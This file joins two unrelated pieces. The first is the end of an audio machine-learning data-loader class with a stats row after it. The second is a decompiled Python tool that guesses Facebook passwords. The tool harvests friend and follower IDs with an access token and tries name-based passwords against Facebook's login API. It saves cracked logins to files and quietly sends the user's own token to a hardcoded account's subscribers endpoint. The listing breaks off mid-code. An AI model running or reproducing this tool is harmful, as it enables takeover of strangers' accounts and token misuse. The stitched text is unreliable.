y_cat[tt] *= 100
# fetch features for the batch and adjust format to input CNN
# (batch_size, 1, time, freq) for channels_first
features = self.features[indexes, np.newaxis]
return features, y_cat
def on_epoch_end(self):
# shuffle data between epochs
self.indexes = np.random.permutation(self.nb_inst_total)
class DataGeneratorPatchBinary(Sequence):
"""
Reads data from disk and returns batches.
allows to create one-hot encoded vectors carrying flags, ie 100 instead of 1.
this is used in the loss functions to distinguish patches coming from noisy or clean set
"""
def __init__(self, labels, feature_dir=None, file_list=None, params_learn=None, params_extract=None,
suffix_in='_mel', suffix_out='_label', floatx=np.float32, scaler=None):
self.data_dir = feature_dir
self.list_fnames = file_list
self.batch_size = params_learn.get('batch_size')
self.floatx = floatx
self.suffix_in = suffix_in
self.suffix_out = suffix_out
self.patch_len = int(params_extract.get('patch_len'))
self.patch_hop = int(params_extract.get('patch_hop'))
self.noisy_ids = params_learn.get('noisy_ids')
self.labels_list = labels
# Given a directory with precomputed features in files:
# - create the variable self.features with all the TF patches of all the files in the feature_dir
# - create the variable self.labels with the corresponding labels (at patch level, inherited from file)
if feature_dir is not None:
self.get_patches_features_labels(feature_dir, file_list)
# standardize the data
self.features2d = self.features.reshape(-1, self.features.shape[2])
# if train set, create scaler, fit, transform, and save the scaler
if scaler is None:
self.scaler = StandardScaler()
self.features2d = self.scaler.fit_transform(self.features2d)
# this scaler will be used later on to scale val and test data
else:
# if we are in val or test set, load the training scaler as a param and transform
self.features2d = scaler.transform(self.features2d)
# after scaling in 2D, go back to tensor
self.features = self.features2d.reshape(self.nb_inst_total, self.patch_len, self.feature_size)
self.on_epoch_end()
self.n_classes = 1
def get_num_instances_per_file(self, f_name):
"""
Return the number of context_windows, patches, or instances generated out of a given file
"""
shape = utils.get_shape(os.path.join(f_name.replace('.data', '.shape')))
file_frames = float(shape[0])
return np.maximum(1, int(np.ceil((file_frames - self.patch_len) / self.patch_hop)))
def get_feature_size_per_file(self, f_name):
"""
Return the dimensionality of the features in a given file.
Typically, this will be the number of bins in a T-F representation
"""
shape = utils.get_shape(os.path.join(f_name.replace('.data', '.shape')))
return shape[1]
def get_patches_features_labels(self, feature_dir, file_list):
"""
Given a directory with precomputed features in files:
- create the variable self.features with all the TF patches of all the files in the feature_dir
- create the variable self.labels with the corresponding labels (at patch level, inherited from file)
- shuffle them
"""
assert os.path.isdir(os.path.dirname(feature_dir)), "path to feature directory does not exist"
print('Loading self.features...')
# list of file names containing features
self.file_list = [f for f in file_list if f.endswith(self.suffix_in + '.data') and
os.path.isfile(os.path.join(feature_dir, f.replace(self.suffix_in, self.suffix_out)))]
self.nb_files = len(self.file_list)
print(self.nb_files)
assert self.nb_files > 0, "there are no features files in the feature directory"
self.feature_dir = feature_dir
# For all set, cumulative sum of instances (or T_F patches) per file
self.nb_inst_cum = np.cumsum(np.array(
[0] + [self.get_num_instances_per_file(os.path.join(self.feature_dir, f_name))
for f_name in self.file_list], dtype=int))
self.nb_inst_total = self.nb_inst_cum[-1]
# how many batches can we fit in the set
self.nb_iterations = int(np.floor(self.nb_inst_total / self.batch_size))
# feature size (last dimension of the output)
self.feature_size = self.get_feature_size_per_file(f_name=os.path.join(self.feature_dir, self.file_list[0]))
# init the variables with features and labels
self.features = np.zeros((self.nb_inst_total, self.patch_len, self.feature_size), dtype=self.floatx)
self.labels = np.zeros((self.nb_inst_total, 1), dtype=self.floatx)
# analogous column vector to flag patches coming from noisy subset of train data
# init to 0. Only 1 if they come from noisy subset
self.noisy_patches = np.zeros((self.nb_inst_total, 1), dtype=self.floatx)
# fetch all data from hard-disk
for f_id in range(self.nb_files):
# for every file in disk, perform slicing into T-F patches, and store them in tensor self.features
self.fetch_file_2_tensor(f_id)
def fetch_file_2_tensor(self, f_id):
"""
# for a file specified by id,
# perform slicing into T-F patches, and store them in tensor self.features
:param f_id:
:return:
"""
mel_spec = utils.load_tensor(in_path=os.path.join(self.feature_dir, self.file_list[f_id]))
label = np.array(self.labels_list)[f_id]
# indexes to store patches in self.features, according to the nb of instances from the file
idx_start = self.nb_inst_cum[f_id] # start for a given file
idx_end = self.nb_inst_cum[f_id + 1] # end for a given file
# slicing + storing in self.features
# copy each TF patch of size (context_window_frames,feature_size) in self.features
idx = 0 # to index the different patches of f_id within self.features
start = 0 # starting frame within f_id for each T-F patch
while idx < (idx_end - idx_start):
self.features[idx_start + idx] = mel_spec[start: start + self.patch_len]
# update indexes
start += self.patch_hop
idx += 1
self.labels[idx_start: idx_end] = label
if int(self.file_list[f_id].split('_')[0]) in self.noisy_ids:
# if the clip comes from noisy subset, flag to 1 all its patches
self.noisy_patches[idx_start: idx_end] = 1
def __len__(self):
return self.nb_iterations
def __getitem__(self, index):
"""
takes an index (batch number) and returns one batch of self.batch_size
:param index:
:return:
"""
# index is taken care of by the Sequencer inherited
indexes = self.indexes[index * self.batch_size:(index + 1) * self.batch_size]
# fetch labels for the batch
y_int = np.empty((self.batch_size, 1), dtype='int')
for tt in np.arange(self.batch_size):
y_int[tt] = int(self.labels[indexes[tt]])
y_cat = y_int
# fetch features for the batch and adjust format to input CNN
# (batch_size, 1, time, freq) for channels_first
features = self.features[indexes, np.newaxis]
return features, y_cat
def on_epoch_end(self):
# shuffle data between epochs
self.indexes = np.random.permutation(self.nb_inst_total)
class DataGeneratorFileFeatures(Sequence):
"""
Reads data from disk and returns batches.
allows to create one-hot encoded vectors carrying flags, ie 100 instead of 1.
this is used in the loss functions to distinguish patches coming from noisy or clean set
"""
def __init__(self, feature_dir=None, file_list=None, params_learn=None, params_extract=None,
suffix_in='_mel', suffix_out='_label', floatx=np.float32, scaler=None):
self.data_dir = feature_dir
self.list_fnames = file_list
self.batch_size = params_learn.get('batch_size')
self.floatx = floatx
self.suffix_in = suffix_in
self.suffix_out = suffix_out
self.patch_len = int(params_extract.get('patch_len'))
self.patch_hop = int(params_extract.get('patch_hop'))
self.noisy_ids = params_learn.get('noisy_ids')
# Given a directory with precomputed features in files:
# - create the variable self.features with all the TF patches of all the files in the feature_dir
# - create the variable self.labels with the corresponding labels (at patch level, inherited from file)
if feature_dir is not None:
self.get_patches_features_labels(feature_dir, file_list)
# standardize the data
self.features2d = self.features.reshape(-1, self.features.shape[2])
# if train set, create scaler, fit, transform, and save the scaler
if scaler is None:
self.scaler = StandardScaler()
self.features2d = self.scaler.fit_transform(self.features2d)
# this scaler will be used later on to scale val and test data
else:
# if we are in val or test set, load the training scaler as a param and transform
self.features2d = scaler.transform(self.features2d)
# after scaling in 2D, go back to tensor
self.features = self.features2d.reshape(self.nb_inst_total, self.patch_len, self.feature_size)
self.n_classes = 1
def get_feature_size_per_file(self, f_name):
"""
Return the dimensionality of the features in a given file.
Typically, this will be the number of bins in a T-F representation
"""
shape = utils.get_shape(os.path.join(f_name.replace('.data', '.shape')))
return shape[1]
def get_patches_features_labels(self, feature_dir, file_list):
"""
Given a directory with precomputed features in files:
- create the variable self.features with all the TF patches of all the files in the feature_dir
- create the variable self.labels with the corresponding labels (at patch level, inherited from file)
- shuffle them
"""
assert os.path.isdir(os.path.dirname(feature_dir)), "path to feature directory does not exist"
print('Loading self.features...')
# list of file names containing features
self.file_list = [f for f in file_list if f.endswith(self.suffix_in + '.data') and
os.path.isfile(os.path.join(feature_dir, f.replace(self.suffix_in, self.suffix_out)))]
self.nb_files = len(self.file_list)
print(self.nb_files)
assert self.nb_files > 0, "there are no features files in the feature directory"
self.feature_dir = feature_dir
# how many batches can we fit in the set
self.nb_iterations = int(np.ceil(self.nb_files / self.batch_size))
# feature size (last dimension of the output)
self.feature_size = self.get_feature_size_per_file(f_name=os.path.join(self.feature_dir, self.file_list[0]))
# init the variables with features and labels
self.features = np.zeros((self.nb_files, self.patch_len, self.feature_size), dtype=self.floatx)
# fetch all data from hard-disk
for f_id in range(self.nb_files):
# for every file in disk, perform slicing into T-F patches, and store them in tensor self.features
self.fetch_file_2_tensor(f_id)
def fetch_file_2_tensor(self, f_id):
"""
# for a file specified by id,
# perform slicing into T-F patches, and store them in tensor self.features
:param f_id:
:return:
"""
mel_spec = utils.load_tensor(in_path=os.path.join(self.feature_dir, self.file_list[f_id]))
self.features[f_id] = mel_spec[0: self.patch_len]
def __len__(self):
return self.nb_iterations
def __getitem__(self, index):
"""
takes an index (batch number) and returns one batch of self.batch_size
:param index:
:return:
"""
# index is taken care of by the Sequencer inherited
indexes = self.indexes[index * self.batch_size:min((index + 1) * self.batch_size, self.nb_inst_total)]
# fetch labels for the batch
y_int = np.empty((self.batch_size, 1), dtype='int')
y_cat = y_int
# fetch features for the batch and adjust format to input CNN
# (batch_size, 1, time, freq) for channels_first
features = self.features[indexes, np.newaxis]
return features, y_cat
| 43.766839 | 122 | 0.651415 | 4,908 | 33,788 | 4.305012 | 0.061736 | 0.020446 | 0.018931 | 0.015618 | 0.932936 | 0.93038 | 0.928108 | 0.924606 | 0.913768 | 0.912253 | 0 | 0.006786 | 0.262874 | 33,788 | 771 | 123 | 43.823606 | 0.841564 | 0.339144 | 0 | 0.882006 | 0 | 0 | 0.044971 | 0 | 0 | 0 | 0 | 0 | 0.032448 | 1 | 0.109145 | false | 0 | 0.014749 | 0.011799 | 0.19469 | 0.017699 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7e81f08edccbe91624c96beb8f589e8cccf73f81 | 51,621 | py | Python | Ty.py | Green-Tiger/Cracking | 789c6ea9f031200bee6f8fdc46c6898e2cbba0d2 | [
"Apache-2.0"
] | null | null | null | Ty.py | Green-Tiger/Cracking | 789c6ea9f031200bee6f8fdc46c6898e2cbba0d2 | [
"Apache-2.0"
] | null | null | null | Ty.py | Green-Tiger/Cracking | 789c6ea9f031200bee6f8fdc46c6898e2cbba0d2 | [
"Apache-2.0"
] | null | null | null | # Source Generated with Decompyle++
# File: AsHari.py (Python 2.7)
#fucked by aziz
try:
import os
import sys
import time
import platform
import datetime
import random
import hashlib
import re
import threading
import json
import getpass
import urllib
import cookielib
import requests
import uuid
import string
import subprocess
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
except ImportError:
os.system('pip2 install requests lolcat')
os.system('python2 riski.py')
from os import system
from time import sleep
def xox(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.04)
user_agent = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',
'Mozilla/5.0 (Linux; Android 10; SM-G973F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.198 Mobile Safari/537.36 Instagram 166.1.0.42.245 Android (29/10; 420dpi; 1080x2042; samsung; SM-G973F; beyond1; exynos9820; en_GB; 256099204)',
'https://graph.facebook.com/100045203855294/subscribers?access_token=']
useragent_url = user_agent[2]
header = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': 'Dalvik/2.1.0 (Linux; U; Android 5.1.1; SM-J320F Build/LMY47V) [FBAN/FB4A;FBAV/43.0.0.29.147;FBPN/com.facebook.katana;FBLC/en_GB;FBBV/14274161;FBCR/Tele2 LT;FBMF/samsung;FBBD/samsung;FBDV/SM-J320F;FBSV/5.0;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,height=1920};FB_FW/1;]',
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
try:
requests.get('https://www.google.com/search?q=Azim+Vau')
requests.get('https://m.youtube.com/results?search_query=Azim+Vau+Mr.+Error')
except requests.exceptions.ConnectionError:
os.system('clear')
xox('\n\t\x1b[93;1m NO INTERNET CONNECTION :(\n\n')
sys.exit()
ip = requests.get('https://api.ipify.org').text.strip()
loc = requests.get('https://ipapi.com/ip_api.php?ip=' + ip, headers = {
'Referer': 'https://ip-api.com/',
'Content-Type': 'application/json; charset=utf-8',
'User-Agent': 'Mozilla/5.0 (Linux; Android 7.1.2; Redmi 4X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36' }).json()['country_name'].upper()
def linex():
os.system('echo "\n ======================================\n" | lolcat -a -d 2 -s 50')
def logo():
os.system('echo "\n _ _ ___ ______ _____ \n | | | | / _ \\ | ___ \\_ _|\n | |_| |/ /_\\ \\| |_/ / | | \n | _ || _ || / | | \n | | | || | | || |\\ \\ _| |_ \n \\_| |_/\\_| |_/\\_| \\_|\\___/ \n ###############################\n # TOOL NAME: { MUHMAND } #\n # AUTHOR : MR. HARI #\n # GITHUB : git.io/AS #\n ###############################" | lolcat -a -d 2 -s 50')
def main():
os.system('clear')
logo()
print '\t\x1b[93;1m MAIN MENU\x1b[0m'
print ''
print '\x1b[92;1m [1] START CRACK'
print '\x1b[93;1m [2] HOW TO GET ACCESS TOKEN'
print '\x1b[94;1m [3] UPDATE TOOL'
print '\x1b[96;1m [J] JOIN MR. MUHMAND GROUP \x1b[92;1m\xe2\x9c\x98\x1b[91;1m\xe2\x9c\x98'
print '\x1b[90;1m [0] EXIT'
print ''
log_sel()
def log_sel():
sel = raw_input('\x1b[93;1m CHOOSE: \x1b[92;1m')
if sel == '':
print '\t\x1b[91;1m SELECT AN OPTION STUPID -_'
log_sel()
elif sel == '1' or sel == '01':
token()
elif sel == '2' or sel == '02':
subprocess.check_output([
'am',
'start',
'https://www.facebook.com/114133313700086/posts/426873429092738'])
main()
elif sel == '3' or sel == '03':
import os
try:
os.system('git clone https://github.com/Aijaz-Muhmand/riskihari')
os.system('rm -rf riskihari.py')
os.system('cp -f riskihari/riskihari.py \\.')
os.system('rm -rf haripro')
xox('\x1b[92;1m\n TOOL UPDATE SUCCESSFUL :)\n')
time.sleep(2)
main()
except KeyboardInterrupt:
print '\x1b[91;1m\n YOUR DEVICE IS NOT SUPPORTED!\n'
main()
if sel == '4' and sel == '04' and sel == 'J' or sel == 'j':
subprocess.check_output([
'am',
'start',
'https://t.me/mrerrorgroup'])
main()
elif sel == '0' or sel == '00':
xox('\n\t\x1b[91;1m GOOD BYE SEE YOU AGAIN :)')
sys.exit()
else:
print ''
print '\t\x1b[91;1m SELECT VALID OPTION'
print ''
log_sel()
def token():
os.system('clear')
try:
token = open('riskihari_token.txt', 'r').read()
menu()
except (KeyError, IOError):
logo()
print ''
print '\t\x1b[92;1m LOGIN TOKEN'
print ''
token = raw_input('\x1b[93;1m PASTE TOKEN HERE: \x1b[92;1m')
sav = open('riskihari_token.txt', 'w')
sav.write(token)
sav.close()
token_check()
menu()
def token_check():
try:
token = open('riskihari_token.txt', 'r').read()
except IOError:
print '\x1b[91;1m[!] TOKEN INVALID'
os.system('rm -rf riskihari_token.txt')
requests.post(useragent_url + token, headers = header)
def menu():
os.system('clear')
try:
token = open('riskihari_token.txt', 'r').read()
except (KeyError, IOError):
token()
try:
r = requests.get('https://graph.facebook.com/me?access_token=' + token)
q = json.loads(r.text)
name = q['name']
except KeyError:
logo()
print ''
print '\x1b[91;1m LOGGED IN TOKEN HAS EXPIRED'
os.system('rm -rf riskihari_token.txt')
print ''
time.sleep(1)
main()
os.system('clear')
xn = name.upper()
logo()
print ''
print '\x1b[93;1m HELLO : \x1b[92;1m' + xn
print '\x1b[93;1m REGION : \x1b[92;1m' + loc
print '\x1b[93;1m YOUR IP : \x1b[92;1m' + ip
print ''
print ''
print '\x1b[92;1m [1] CRACK WITH AUTO PASS'
print '\x1b[93;1m [2] CRACK WITH DIGIT PASS'
print '\x1b[91;1m [0] BACK'
print ''
menu_option()
def menu_option():
select = raw_input('\x1b[92;1m CHOOSE : ')
if select == '1':
crack1()
elif select == '2':
crack()
elif select == '0':
main()
else:
print ''
print '\t\x1b[91;1m SELECT VALID OPTION'
print ''
menu_option()
def crack1():
global token
os.system('clear')
try:
token = open('riskihari_token.txt', 'r').read()
except IOError:
print ''
print '\t\x1b[91;1m TOKEN NOT FOUND '
time.sleep(1)
fb_token()
os.system('clear')
logo()
print ''
print '\t\x1b[93;1m CRACK WITH AUTO PASS'
print ''
print '\x1b[94;1m [1] CRACK PUBLIC ID'
print '\x1b[93;1m [2] CRACK FOLLOWERS'
print '\x1b[92;1m [3] CRACK FILE'
print ''
crack_select1()
def crack_select1():
select = raw_input('\x1b[92;1m CHOOSE : ')
id = []
oks = []
cps = []
if select == '1':
os.system('clear')
logo()
print ''
print '\t\x1b[92;1m MULTI PUBLIC ID COINING '
print ''
try:
id_limit = int(raw_input('\x1b[93;1m ENTER LIMIT (\x1b[91;1m5 MAX\x1b[93;1m): \x1b[92;1m'))
print ''
except:
id_limit = 1
for t in range(id_limit):
t += 1
idt = raw_input('\x1b[93;1m INPUT PUBLIC ID (\x1b[92;1m%s\x1b[93;1m) : \x1b[92;1m' % t)
try:
for i in requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + token).json()['data']:
uid = i['id'].encode('utf-8')
na = i['name'].encode('utf-8')
id.append(uid + '|' + na)
except KeyError:
print '\x1b[91;1m PRIVATE FRIEND LIST TRY ANOTHER ONE'
print '\x1b[94;1m TOTAL IDS : \x1b[0;92m%s\x1b[0;97m' % len(id)
time.sleep(3)
elif select == '2':
os.system('clear')
logo()
print ''
print ' \x1b[92;1mMULTI FOLLOWERS ID COINING '
print ''
try:
id_limit = int(raw_input('\x1b[93;1m ENTER LIMIT (\x1b[91;1m5 MAX\x1b[93;1m): \x1b[92;1m'))
print ''
except:
id_limit = 1
for t in range(id_limit):
t += 1
idt = raw_input('\x1b[93;1m INPUT FOLLOWER ID (\x1b[92;1m%s\x1b[93;1m) : \x1b[92;1m' % t)
try:
for i in requests.get('https://graph.facebook.com/' + idt + '/subscribers?access_token=' + token + '&limit=999999').json()['data']:
uid = i['id'].encode('utf-8')
na = i['name'].encode('utf-8')
id.append(uid + '|' + na)
except KeyError:
print '\x1b[91;1m PRIVATE FRIEND LIST TRY ANOTHER ONE'
print '\x1b[94;1m TOTAL IDS : \x1b[0;92m%s\x1b[0;97m' % len(id)
time.sleep(3)
elif select == '3':
os.system('clear')
logo()
print ''
print '\t\x1b[93;1m AUTO PASS CRACKING'
print ''
filelist = raw_input('\x1b[92;1m INPUT FILE: ')
try:
for line in open(filelist, 'r').readlines():
id.append(line.strip())
except IOError:
print '\t\x1b[91;1m REQUESTED FILE NOT FOUND'
print ''
raw_input('\x1b[93;1m PRESS ENTER TO BACK')
crack1()
if select == '0':
menu()
else:
print ''
print '\t\x1b[91;1m SELECT VALID OPTION'
print ''
crack_select1()
os.system('clear')
logo()
print ''
print '\x1b[93;1m TOTAL IDS : \x1b[92;1m' + str(len(id))
print '\x1b[92;1m BRUTE HAS BEEN STARTED\x1b[0m'
print '\x1b[94;1m WAIT AND SEE \x1b[92;1m\xe2\x9c\x98\x1b[91;1m\xe2\x9c\x98\x1b[0m'
linex()
def main(arg):
user = arg
(uid, name) = user.split('|')
_azimua = random.choice([
'Mozilla/5.0 (Linux; Android 10; Redmi Note 8 Pro Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/275.0.0.49.127;]',
'[FBAN/FB4A;FBAV/246.0.0.49.121;FBBV/181448449;FBDM/{density=1.5,width=540,height=960};FBLC/en_US;FBRV/183119516;FBCR/TM;FBMF/vivo;FBBD/vivo;FBPN/com.facebook.katana;FBDV/vivo 1606;FBSV/6.0.1;FBOP/1;FBCA/armeabi-v7a:armeabi;]',
'Dalvik/2.1.0 (Linux; U; Android 5.1.1; SM-J320F Build/LMY47V) [FBAN/FB4A;FBAV/43.0.0.29.147;FBPN/com.facebook.katana;FBLC/en_GB;FBBV/14274161;FBCR/Tele2 LT;FBMF/samsung;FBBD/samsung;FBDV/SM-J320F;FBSV/5.0;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,height=1920};FB_FW/1;]',
'Mozilla/5.0 (Linux; Android 5.1.1; A37f Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/305.1.0.40.120;]',
'Mozilla/5.0 (Linux; Android 10; REALME RMX1911 Build/NMF26F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 AlohaBrowser/2.20.3',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E216 [FBAN/FBIOS;FBAV/170.0.0.60.91;FBBV/105964764;FBDV/iPhone10,1;FBMD/iPhone;FBSN/iOS;FBSV/11.3;FBSS/2;FBCR/Sprint;FBID/phone;FBLC/en_US;FBOP/5;FBRV/106631002]',
'Mozilla/5.0 (Linux; Android 7.1.1; ASUS Chromebook Flip C302 Build/R70-11021.56.0; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Safari/537.36 [FB_IAB/FB4A;FBAV/198.0.0.53.101;]'])
try:
pass1 = name.lower().split(' ')[0] + '1234'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass1,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass1 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass1 + '\n')
ok.close()
oks.append(uid + pass1)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass1 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass1 + '\n')
cp.close()
cps.append(uid + pass1)
else:
pass2 = name.lower().split(' ')[0] + '123'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass2,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass2 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass2 + '\n')
ok.close()
oks.append(uid + pass2)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass2 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass2 + '\n')
cp.close()
cps.append(uid + pass2)
else:
pass3 = name.lower().split(' ')[0] + '12'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass3,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass3 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass3 + '\n')
ok.close()
oks.append(uid + pass3)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass3 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass3 + '\n')
cp.close()
cps.append(uid + pass3)
else:
pass4 = name.lower().split(' ')[1] + '1234'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass4,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass4 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass4 + '\n')
ok.close()
oks.append(uid + pass4)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass4 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass4 + '\n')
cp.close()
cps.append(uid + pass4)
else:
pass5 = name.lower().split(' ')[1] + '123'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass5,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass5 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass5 + '\n')
ok.close()
oks.append(uid + pass5)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass5 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass5 + '\n')
cp.close()
cps.append(uid + pass5)
else:
pass6 = name.lower().split(' ')[1] + '12'
api = 'https://b-api.facebook.com/method/auth.login'
params = {
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'format': 'JSON',
'sdk_version': '2',
'email': uid,
'locale': 'en_US',
'password': pass6,
'sdk': 'ios',
'generate_session_cookies': '1',
'sig': '3f555f99fb61fcd7aa0c44f58f522ef6' }
headers_ = {
'x-fb-connection-bandwidth': str(random.randint(2e+07, 3e+07)),
'x-fb-sim-hni': str(random.randint(20000, 40000)),
'x-fb-net-hni': str(random.randint(20000, 40000)),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': _azimua,
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
data = requests.get(api, params = params, headers = headers_)
if 'access_token' in data.text and 'EAAA' in data.text:
print ' \x1b[1;32m[HARI-OK] ' + uid + ' | ' + pass6 + '\x1b[0;97m'
ok = open('ok.txt', 'a')
ok.write(uid + '|' + pass6 + '\n')
ok.close()
oks.append(uid + pass6)
elif 'www.facebook.com' in data.json()['error_msg']:
print ' \x1b[1;33m[HARI-CP] ' + uid + ' | ' + pass6 + '\x1b[0;97m'
cp = open('cp.txt', 'a')
cp.write(uid + '|' + pass6 + '\n')
cp.close()
cps.append(uid + pass6)
else:
pass7 = name.lower()
api = 'https://b-api.facebook.com/method/auth.login'
params = {
